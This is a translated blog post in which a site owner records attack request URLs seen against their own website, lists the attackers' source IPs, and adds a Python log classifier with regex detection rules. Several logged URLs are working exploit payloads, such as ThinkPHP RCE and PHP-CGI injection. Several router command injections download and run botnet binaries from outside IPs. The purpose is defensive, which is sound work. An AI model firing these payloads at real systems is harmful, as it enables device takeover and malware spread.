
Simple vulnerability-exploitation parameters seen in request URLs


1. Notes

A record of some of the attacks observed against my own website. The attempts are delivered by appending a path or query string that carries the payload to the domain, so every example below is simply the request target as it arrived.

The domain http://www.test.com is used as a placeholder in the examples.

2. Specific examples

http://www.test.com/bak.zip
http://www.test.com/backup_11062022.tar
http://www.test.com/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
http://www.test.com/solr/admin/cores?action=STATUS&wt=json
http://www.test.com//vendor/phpunit/phpunit/phpunit.xsd
http://www.test.com/.svn/wc.db
http://www.test.com/robots.txt
http://www.test.com/.env
http://www.test.com/.env.example
http://www.test.com/.env.backup
http://www.test.com/core/.git/config
http://www.test.com/s/7313e2033323e2131313e27343/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
http://www.test.com/ttd.exe
http://www.test.com/cgi-bin/login.cgi
http://www.test.com/cgi-bin/luci/;stok=/locale
http://www.test.com/cgi-bin/jarrewrite.sh
http://www.test.com/.vscode/sftp.json
http://www.test.com/login.jsp
http://www.test.com/manage/account/login
http://www.test.com/systembc/password.php
http://www.test.com/.well-known/security.txt
http://www.test.com/wp-includes/wlwmanifest.xml
http://www.test.com/xmlrpc.php
http://www.test.com/Tva1
http://www.test.com/.DS_Store
http://www.test.com/cf_scripts/scripts/ajax/ckeditor/ckeditor.js
http://www.test.com/aab9
http://www.test.com/_profiler/phpinfo
http://www.test.com/videos/vts/20230726/d9/14/4d5cb760df60039c3feb18b24ba13a1c.ts
http://www.test.com/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
http://www.test.com/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.test.com/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)
http://www.test.com/?tag&tagstpl=news.html&tag={pbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))}ok{/pbohome/Indexot:if}&t=file_put_contents&t1=b5ac9b2ee49f0ee2aa0db9db957dc613.php&t2=file_get_contents&t3=https://xingzuo.zhlgch.compbcms.txt
http://www.test.com/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php
http://www.test.com/index.php?lang=../../../../../../../../tmp/index1
http://www.test.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
http://www.test.com/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
http://www.test.com/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60)
http://www.test.com/index/ajax/lang?lang=../../application/database
http://www.test.com/dns-query?dns=sJQBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
http://www.test.com/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
http://www.test.com/index.php?acti=search&g=global&s=api&name=content_news.html&f=database&suffix=html&c=api&key=id&m=template&usr=admin&catid=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&cat%5Bpid%5D=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&index%5Bid%5D=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&searchid=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&urlrule=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&form_table=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A
http://www.test.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application

3. Disclaimer

This post will be updated continuously. Its content is provided solely as a record and for defensive purposes; use for illegal purposes is prohibited, and anyone who does so bears the consequences.

4. Source IPs of the attacks

A record of the source IPs. Most are compromised hosts ("zombies") abroad; the domestic ones are mostly public IPs of regional telecom carriers (shared egress addresses), which cannot simply be blocked, or an entire region could lose access to the site. An Alibaba Cloud IP showed up once, but Alibaba Cloud refused to disclose further information about that IP to an individual; since no loss was caused, the matter was not pursued. Had there been a loss, the relevant authorities could have been asked to obtain the information. The specific records follow.

IP address        Location                                              Longitude   Latitude
43.138.241.199    Haidian, Beijing, China                               116.302     39.9786
120.85.113.193    Guangzhou, Guangdong, China [China Unicom]            113.2539    23.1181
113.215.189.97    Lipu Town, Zhejiang, China [Wasu]                     119.789     29.1416
113.215.189.226   Lipu Town, Zhejiang, China [Wasu]                     119.789     29.1416
106.75.6.251      Yangpu, Shanghai, China [UCLOUD]                      121.508     31.2999
103.194.186.10    Sheung Wan, Central and Western District, Hong Kong   114.149     22.2862
94.156.65.8       Karlovo, Plovdiv, Bulgaria                            24.7995     42.627
31.220.1.83       Amsterdam, North Holland, Netherlands                 4.90414     52.3676
80.94.92.60       Amsterdam, North Holland, Netherlands                 4.90414     52.3676
91.92.249.4       Amsterdam, North Holland, Netherlands                 4.90414     52.3676
128.90.170.21     Warsaw, Mazovia, Poland                               20.9846     52.1828
45.124.84.224     Phúc Lai, Bắc Ninh, Vietnam                           105.79      20.9652
51.222.253.2      Singapore, Central Singapore, Singapore               103.851     1.28141
128.199.222.142   Singapore, South West, Singapore                      103.695     1.32123
78.153.140.177    London, England, United Kingdom                       -0.093      51.5088
78.153.140.224    London, England, United Kingdom                       -0.093      51.5088
78.153.140.175    London, England, United Kingdom                       -0.093      51.5088
78.153.140.222    London, England, United Kingdom                       -0.093      51.5088
195.191.219.130   London, England, United Kingdom                       -0.1196     51.5074
185.164.121.40    Frankfurt, Hesse, Germany                             8.7321      50.1093
45.142.182.92     Übach-Palenberg, North Rhine-Westphalia, Germany      6.11938     50.9199
148.153.56.86     Los Angeles, California, USA                          -118.2441   34.0544
148.153.45.234    Los Angeles, California, USA                          -118.2441   34.0544
54.164.169.144    Ashburn, Virginia, USA                                -77.4874    39.0438
142.202.48.16     New York, New York, USA                               -74.0059    40.7127
34.239.164.71     Ashburn, Virginia, USA                                -77.4874    39.0438
52.167.144.67     Boydton, Virginia, USA                                -78.37471   36.677696
162.216.150.228   Charleston, South Carolina, USA                       -80.013     32.8771
204.12.231.82     Kansas City, Missouri, USA                            -94.5786    39.1374
64.225.59.234     Clifton, New Jersey, USA                              -74.1403    40.8364
194.38.23.16      Dnipro, Dnipropetrovsk Oblast, Ukraine                35.046      48.4735
65.109.134.233    Helsinki, Uusimaa, Finland                            24.9344     60.1797
43.158.217.137    Mumbai, Maharashtra, India                            72.8776     19.0759
179.43.143.42     Zurich, Canton of Zurich, Switzerland                 8.5163      47.3934
8.211.162.45      Tokyo, Tokyo, Japan                                   139.6899    35.6893
80.14.8.244       Aubervilliers, Île-de-France, France                  2.38405     48.9123
54.36.148.247     Roubaix, Hauts-de-France, France                      3.20157     50.6917
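The following is an added example written for this edit; it is not code from the original post. It shows how the request targets listed in section 2 can be classified from a web-server access log, and how the per-IP scoring that section 4 calls for (act on repeated or high-severity hits, never on a single request from a carrier-shared address) can be built on top of that classification. The combined log format, the category names, the weights, the regexes and the sample log lines are all my own assumptions; the sample lines reuse paths from section 2 and IPs from the table above but are constructed, not captured traffic. Worth noting from the page's own payloads: several of them pad PHP code with `*` and `/**/` (`e*x**i**t**(` only reads `exit(` once the padding is stripped), so the normaliser removes that padding before any rule runs.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache/nginx "combined" access-log format (assumed; adjust to your server).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# `/**/` and `/*-*/` padding used by the obfuscated CMS payloads on this page.
COMMENT = re.compile(r"/\*.*?\*/")


def normalize(target: str) -> str:
    """Percent-decode (twice, for double-encoded payloads), strip comment and
    star padding, and lower-case, so the rules below see the real payload."""
    decoded = unquote_plus(unquote_plus(target))
    decoded = COMMENT.sub("", decoded)
    return decoded.replace("*", "").lower()


# Ordered rules (first match wins): category, severity weight, pattern.
# Categories and weights are editorial assumptions derived from section 2.
RULES = [
    ("command_injection", 10,
     re.compile(r"\$\{ifs\}|\$\(|`|;\s*(cd|rm|wget|curl|chmod)\s")),
    ("thinkphp_invokefunction", 10,
     re.compile(r"invokefunction.*call_user_func_array")),
    ("phpunit_eval_stdin", 10, re.compile(r"/phpunit/.*eval-stdin\.php")),
    ("php_cgi_ini_injection", 10,
     re.compile(r"allow_url_include|auto_prepend_file")),
    ("php_function_injection", 10,
     re.compile(r"file_put_contents|eval\(|exit\(|\$_(get|post|request|param)")),
    ("path_traversal", 5, re.compile(r"(\.\./){2,}|pearcmd")),
    ("secret_or_backup_leak", 3,
     re.compile(r"/\.(env|git|svn|vscode|ds_store)|\.(zip|tar|bak|sql|gz)$|phpinfo")),
    ("service_fingerprint", 1,
     re.compile(r"/solr/|/xmlrpc\.php|/cgi-bin/|/meta-inf/|wlwmanifest|/ecp/|/dns-query|/_profiler")),
]


def classify(target: str) -> tuple[str, int]:
    """Return (category, weight) for one request target; weight 0 = benign/unknown."""
    text = normalize(target)
    for name, weight, pattern in RULES:
        if pattern.search(text):
            return name, weight
    return "unclassified", 0


def score_log(lines):
    """Aggregate per source IP: cumulative severity and hit counts per category."""
    per_ip = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # line in another format; skip rather than guess
        category, weight = classify(m["target"])
        entry = per_ip.setdefault(m["ip"], {"score": 0, "hits": Counter()})
        entry["score"] += weight
        entry["hits"][category] += 1
    return per_ip


def block_candidates(lines, threshold=10):
    """IPs whose cumulative score reaches the threshold. One robots.txt or
    security.txt fetch never qualifies; one RCE attempt or a run of secret-file
    probes does. Check an allowlist of carrier/NAT ranges before acting on these."""
    return sorted(ip for ip, e in score_log(lines).items() if e["score"] >= threshold)


# Constructed sample log (not captured traffic): paths from section 2, IPs from
# the table in section 4. The last target is shortened from the page's payload.
SAMPLE_LOG = [
    '94.156.65.8 - - [05/Sep/2024:10:09:01 +0800] "GET /.env HTTP/1.1" 404 153',
    '94.156.65.8 - - [05/Sep/2024:10:09:02 +0800] "GET /.env.backup HTTP/1.1" 404 153',
    '94.156.65.8 - - [05/Sep/2024:10:09:03 +0800] "GET /core/.git/config HTTP/1.1" 404 153',
    '94.156.65.8 - - [05/Sep/2024:10:09:04 +0800] "GET /bak.zip HTTP/1.1" 404 153',
    '78.153.140.177 - - [05/Sep/2024:10:11:20 +0800] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 153',
    '78.153.140.177 - - [05/Sep/2024:10:11:21 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 153',
    '43.138.241.199 - - [05/Sep/2024:10:12:00 +0800] "GET /robots.txt HTTP/1.1" 200 68',
    '43.138.241.199 - - [05/Sep/2024:10:12:01 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 153',
    '120.85.113.193 - - [05/Sep/2024:10:13:40 +0800] "GET /index.php?catid=+keywords%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A HTTP/1.1" 404 153',
]

if __name__ == "__main__":
    for ip, entry in score_log(SAMPLE_LOG).items():
        print(ip, entry["score"], dict(entry["hits"]))
    print("candidates:", block_candidates(SAMPLE_LOG))
```

Run against a real log with `score_log(open("access.log"))`. The threshold of 10 means a single command-injection or PHP-code payload is enough on its own, while harmless probes only add up across several requests; that is the property the section-4 caveat needs, since a shared carrier address that sends one stray request is never listed.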
Tag: intrusion scanning
  • Author: 一介闲人
  • Published: 2024-09-05 10:09
  • Copyright: original work; reproduction must retain attribution
  • Reposting on a WeChat public account: add a link to this post at the end
  • Comments

    张三
    Noted.